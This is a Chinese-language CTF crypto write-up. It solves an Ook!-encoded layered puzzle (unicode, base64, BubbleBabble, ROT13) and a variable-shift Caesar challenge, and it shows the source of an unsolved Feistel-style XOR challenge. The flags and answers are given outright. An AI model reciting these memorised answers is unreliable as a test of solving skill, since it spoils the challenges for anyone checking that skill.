..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.!!! !!!!! !!!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ...!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... .!.!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. ..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
....! .!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .....
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!.!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... .....
..... ..... ..!.! !!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... ..... ..... ..... !.!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
....! ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... ..!.! !!!!! !!!!! !!!!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! ..... !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ....! .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. ..... .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!.!! !!!!! !!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ....! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..!.! !!!!! !!!!! !!!!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... ..... !.!!! !!!!!
!!!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?. .....
..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... .....
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .....
..... .!.!! !!!!! !!!!! !!!!! !!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... .!... ..... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?... ..... ..... ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .....
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..... .....
..!.! !!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ..!.! !!!!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... .!... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?..! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... .....
!?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! ...!.
?.... ..... ....! ?!!.? ..... ..... ..?.? !.?.. !.?.. ..... ....! ?!!.?
..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?.
?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!!
!!!.! ..... ..... ...!. !!!!! !!!!! !.?.. ..... ..... .!?!! .?... .....
....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!!
.?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ..!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... .!.?. ..... ..... !?!!. ?....
..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.?
!!!!! !!!!! !.!.. ..... ..... .!... ....! .?... ..... ...!? !!.?. .....
....? .?!.? ..... ..... ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.!!! .?... ..... ..... !?!!. ?.... ..... ...?.
?!.?. ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!.
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?. ..... .....
!?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!. !!!!! !!!!. ?.... .....
....! ?!!.? ..... ..... ..?.? !.?.. ..... ...!. ?.... ..... ..!?! !.?..
..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?!
.?!!! !!!!! !!!.! ..... ..... ..... !.!!! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.!! !!!!! !!.?. ..... ..... ..!?! !.?.. ..... .....
?.?!. ?.... ..... ...!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
....! ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..!.. .!.?. ..... .....
..!?! !.?.. ..... ..... ?.?!. ?.... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!? !!.?. .....
..... .?.?! .?... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.? ..... ..... ..?.? !.?..
..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ....! .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.!!! !!!!! !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?... ..... ..... !?!!. ?....
..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!.
?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!.
..... ..... !.... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?....
..... ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? .....
..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..... .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... !.... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? ..... ..... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... ..!.! !!!!! !!!.? .....
..... ...!? !!.?. ..... ..... .?.?! .?... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!. ?.... ..... ....! ?!!.?
..... ..... ..?.? !.?.. ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ....! ..... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ..... .!.!! !!!!! .?...
..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!! !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... !.... ..... !.?.. ..... ..... .!?!! .?... .....
....? .?!.? !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ..... ...!.
!!!!! !!!!! !!!!! .?... ..... ...!? !!.?. ..... ....? .?!.? !.?.. .....
..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... .....
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ..!.! !!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !!!.? ..... ..... ...!?
!!.?. ..... ..... .?.?! .?... ..... ....! .?... ..... ...!? !!.?. .....
....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!!
!!!!! !!!!. !.... ..... ..... .!.!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?.. !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
..!.! !!!!! !.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ...!.
?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.?
!!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! !!!!!
!.?.. ..... ..... .!?!! .?... ..... ....? .?!.? ..... ..... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ...!. !.?.. ..... ..... .!?!!
.?... ..... ....? .?!.? ..... ..... !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ...!. ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?!
.?... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... .....
..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... ...!.
!!!!! !!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ....! .?...
..... ...!? !!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!!
!!!!! !!!!! !!?.? !.?!! !!!!! !!!!. !.... ..... ....! .!!!! !!!!! !!.?.
..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... ..... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ...!. ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!... !.?.. ..... ..... .!?!! .?... ..... ....? .?!.?
..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... ..... ..... ...!?
!!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... ..... ....! .!!!!
!!!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... ..... !.!!! !!!!! !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..... ..... ..!.? ..... ..... .!?!!
.?... ..... ..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.!. ..... ..... !.... .!.?. ..... ..... ..!?! !.?..
..... ..... ?.?!. ?..!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?...
..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! .....
..!.. ..... ..... .!.?. ..... ..... !?!!. ?.... ..... .?.?! .?... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.!. ..... .!...
....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ...!. ?.... .....
..!?! !.?.. ..... ...?. ?!.?! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!. !!!!! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. ..... ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... !.... ...!. ?.... ..... ....! ?!!.? ..... .....
..?.? !.?!. ?.... ..... ..!?! !.?.. ..... ...?. ?!.?! .?... ..... .....
....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!.! ..... ..... ...!.
..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?..! .?... ..... ...!?
!!.?. ..... ....? .?!.? !.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!!
!!?.? !.?!! !!!!! !!!!. !.... ...!. ?.... ..... ..... .!?!! .?... .....
..... .?.?! .?!.? .

直接用网站解码ook

然后得到了一串unicode编码

\u0065\u0047\u006c\u0069\u005a\u0057\u0067\u0074\u0061\u0032\u0056\u006a\u0062\u0032\u0063\u0074\u0064\u006e\u006c\u0032\u0059\u0057\u0073\u0074\u0062\u0057\u006c\u0073\u0061\u0057\u0077\u0074\u0062\u0058\u006c\u0074\u005a\u0057\u0059\u0074\u0059\u006e\u0056\u0077\u0059\u0057\u0067\u0074\u0065\u006d\u0056\u0077\u0061\u0057\u0067\u0074\u0061\u0047\u0046\u0069\u0065\u0057\u0073\u0074\u0062\u0047\u0056\u0073\u0064\u0057\u0051\u0074\u0059\u0032\u0039\u0073\u0064\u0057\u0073\u0074\u0062\u0048\u006c\u0030\u0062\u0032\u0077\u0074\u0061\u0033\u0056\u0074\u0061\u0057\u0067\u0074\u0062\u0057\u0039\u0036\u0064\u0058\u0067\u003d

eGliZWgta2Vjb2ctdnl2YWstbWlsaWwtbXltZWYtYnVwYWgtemVwaWgtaGFieWstbGVsdWQtY29sdWstbHl0b2wta3VtaWgtbW96dXg=

盲猜base64

xibeh-kecog-vyvak-milil-mymef-bupah-zepih-habyk-lelud-coluk-lytol-kumih-mozux

查看wp发现这是BubbleBabble，简单得去了解一下，记一下特征，然后用工具一把梭

得到AVFN{h_xa0j_jU@g_!_guvaX}

发现提交不正确，再看一下这个flag也没有意义，比如说前不应该是ACFN，所以考虑是不是替换密码，所以就去试了一下凯撒

发现是ROT13

flag为NISA{u_kn0w_wH@t_!_thinK}

funnycaeser

题目：NRQ;P<uLliW^(XQ/QT\NDh

提示：凯撒5号说：大家为什么都说我很奇怪？

尝试一下凯撒偏移5

很显然不是，而且反向偏移5也明显不是，所以考虑他应该是偏移密码的变种，首先想到偏移ascii码，写个python脚本看看

在找个ascii字母表对照看一下

[73, 77, 76, 59, 75, 60, 112, 71, 103, 100, 82, 94, 40, 83, 76, 47, 76, 79, 92, 73, 89, 99]

可以大胆的猜一下，这个flag是以NSSCTF开头的，然后接着对照其他字符

第二位和第三位的ascii码不一样，这就说明不是简单的位移关系，而是存在某个公式

73+5=78=N

77+6=83=S

76+7=83=S

59+8=67=C

想必写到这里就不用再写下去了，是一个偏移量为n+4的位移方式

写出脚本如下

# enc = r'NRQ;P<uLliW^(XQ/QT\NDh'
enc = r'IML;K<pGgdR^(SL/LO\IYc'
flag = ''
ascii = []
caeser = 5
for i in enc:
    # ascii.append(ord(i))
    # print(ascii)
    flag += chr(ord(i) + caeser)
    caeser+=1
print(flag)

xor

题目

import os
import base64
from Crypto.Util import number, strxor

# from flag import flag

flag = 'xxxxxxxxxxxxxxxxxx'


# 返回八个16bite
def gen_key():
    return [os.urandom(16) for _ in range(8)]


def rnd(b: bytes, k: bytes):
    l = b[:16]  # 左边16位
    r = b[16:]     # 右边16位
    _r = l      # _r位右边16位
    _l = strxor.strxor(strxor.strxor(r, k), l)      # 右边16位与k（16位）先异或，再将异或得到的结果与左边16位异或
    return _l + _r      # 返回右边16位加上异或得到的最终结果相加


def enc(b: bytes, ks):
    c = b
    for i in range(8):
        c = rnd(c, ks[i])
    return c


if __name__ == '__main__':
    a = os.urandom(32)  # 获取32位bite，并赋值给a
    ks = gen_key()  # 获取八个16bite，作为密钥
    enc_a = enc(a, ks)  # 密文a：将32bite持续与16bite进行rnd加密8次
    enc_flag = enc(flag.encode(), ks) # 密文flag：将flag执行同样的流程
    print(base64.b64encode(a).decode())
    print(base64.b64encode(enc_a).decode())
    print(base64.b64encode(enc_flag).decode())

# i03yXzXWe4QTiwJHlUZo6iqEdDkwJVviSOQ7CM3vJmM=
# 4EnYOhbivTMP5r4VYLA8cwJBFTXIeeKAoNf/3ctgLLA=
